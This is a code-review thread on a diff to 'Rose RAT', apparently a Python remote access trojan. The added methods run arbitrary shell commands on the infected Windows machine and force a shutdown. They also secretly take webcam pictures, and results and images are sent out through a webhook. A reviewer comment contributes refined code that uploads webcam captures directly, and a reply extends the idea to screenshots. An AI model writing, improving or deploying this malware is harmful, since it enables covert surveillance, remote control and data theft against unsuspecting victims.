source/rat.py

```diff
@@ -33,6 +42,75 @@ def messagebox(self, message):
         ICON_STOP = 0x10
         ctypes.windll.user32.MessageBoxW(0, message, "Error", MB_HELP | MB_YESNO | ICON_STOP)
         
+    def shell(self, instruction):
+        def _shell():
+            output = subprocess.run(instruction, stdout=subprocess.PIPE,shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
+            return output
+        
+        try:    
+            result = str(_shell().stdout.decode('CP437')) #CP437 Decoding used for characters like " é " etc..
+        except Exception as e:
+            result = str(f"Error | Advanced log: {e}")
+            
+        embed = Embed(
+            description='Rose RAT',
+            color=11495919,
+            timestamp='now'  # sets the timestamp to current time
+        )
+
+        embed.set_author(name=f"Shell command result | {instruction}", icon_url=cc.get_avatar())
+        embed.set_footer(text=cc.get_footer(), icon_url=cc.get_avatar())
+        embed.add_field(name="Result", value=f'`{result}`')
+        
+        self.webhook.send(embed=embed)
+        
+    def shutdown(self):
+        embed = Embed(
+            description='Rose RAT',
+            color=11495919,
+            timestamp='now'  # sets the timestamp to current time
+        )
+
+        embed.set_author(name=f"Shuting down the PC", icon_url=cc.get_avatar())
+        embed.set_footer(text=cc.get_footer(), icon_url=cc.get_avatar())
+        
+        self.webhook.send(embed=embed)
+        os.system("shutdown /s /t 1")
+        
+    def webcampic(self): #Take a picture with the webcam and send it with the webhook
+        try:
+            file_name = ''.join(random.choice(string.ascii_letters) for i in range(10))
+            cam = cv2.VideoCapture(0)   # 0 -> index of camera
+            s, img = cam.read()
+            if s:    # frame captured without any errors
+                cv2.imwrite(f"temp_{file_name}.jpg",img)
```

Comment:
instead of making a temp file, directly send the picture

```py
import io
cam = cv2.VideoCapture(0)   # 0 -> index of camera
s, img = cam.read()
if s:    # frame captured without any errors
    suc, buffer = cv2.imencode(".jpg", img)
    io_buf = io.BytesIO(buffer)
    file = File(io_buf,name='cam.jpg') 
    self.webhook.send(file=file)
```

Reply:
same for screenshot